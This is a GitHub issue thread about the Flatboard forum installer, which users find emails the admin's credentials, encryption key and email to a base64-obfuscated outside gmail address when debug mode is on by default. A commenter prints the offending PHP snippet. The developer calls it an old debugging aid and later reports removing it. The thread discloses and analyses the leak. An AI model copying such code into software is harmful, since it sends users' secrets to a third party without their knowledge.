### ISSUE TITLE
what the hell is this???

### ISSUE THREAD

**Issue by atomGit** [Fred89/flatboard#21]
i installed the forum and it sends an email containing my user name and password to a gmail address? `stradfred@gmail.com`

wtf?

**Comment by simon511000** [comment]
I can confirm this behavor, here is the code that sends the email:
```php
// lib/install.file:166
if (DEBUG_MODE) {
    $description  = '<h6>'.$config['description'].'</h6>';
    $description .= '<br/>'.KEY.'<br/>';
    $description .= $_POST['admin'].'<br/>';
	$description .= $config['mail'].'<br/>';
	$description .= '<a href="' .HTML_BASEPATH.'">' .$config['title']. '</a>'."\n";	
	file_put_contents("/tmp/miaou.txt", $description);
	Util::sendMail($config['title'], $config['mail'], base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ=='), $lang['flatBoard_installer'], $description, 'html');
}
```
`base64_decode('c3RyYWRmcmVkQGdtYWlsLmNvbQ==')` correspond to `stradfred@gmail.com`.
The content of the email is:

```
<h6>Forum's description</h6><br/>encryption key<br/>user@pass<br/>admin's email<br/><a href="forum's url">forum's name</a>
```

The debug mode is enabled by default as showns in the `init.php` file:
```php
// init.php:49
const DEBUG_MODE 		= TRUE;
```

**Comment by simon511000** [comment]
I created an [announcement](https://flatboard.org/view.php/topic/2023-12-27190726469f3) in the forum to warn other users

**Comment by atomGit** [comment]
this whole thing has a strange odor to it - 3.1 was released in 2/2023, so the dev(s) knew this was happening for 10 months - there's no reason to have let it go that long and there's absolutely no reason to _ever_ send these credentials anywhere, not for debugging reasons or any other 

also all the other unnecessarily base64 encoded stuff

**Comment by simon511000** [comment]
I can confirm, I logged into my client area, and it's clear that the archive hasn't been updated since 03/23/2023.
![image](https://github.com/Fred89/flatboard/assets/31013205/3a617c92-5155-4f94-b164-d466cbb9ef40)

I also agree with you; it's very strange. If it was genuinely for debugging, what's the point of sending information via email instead of just displaying it in the console or writing it to a log file?

And how are these details useful for debugging, considering they are already accessible in the forum files?

**Comment by Fred89** [comment]
Hi!
Don't worry for this old feature on Flatboard 2.0 
I added a new hash for password in User.lib.php on line 130
`$config['admin'] = hash_hmac('sha1', $_POST['password'], KEY);`

At that time several users had problems when updating with this new hash.
I therefore added this piece of code which is only activated if debug mode is ON in order to see if the installation script returned the correct hashed password, and therefore had access with user authorization at the installation site.

So don't panic, I don't work for the government and Flatboard is rarely used anyway (I received a 20th email since March 23, 2023!)

I will remove this piece of code in a future Flatboad update :)

**Comment by Fred89** [comment]
As Simon commented on the forum, a simple `DEBUG_MODE = FALSE;` is enough.
Happy New Year's Eve

**Comment by Fred89** [comment]
The code has been removed in the new version of [Flatboard 3.2 "SHIBA"](https://flatboard.org/view.php/topic/2024-05-20153015eb87c)
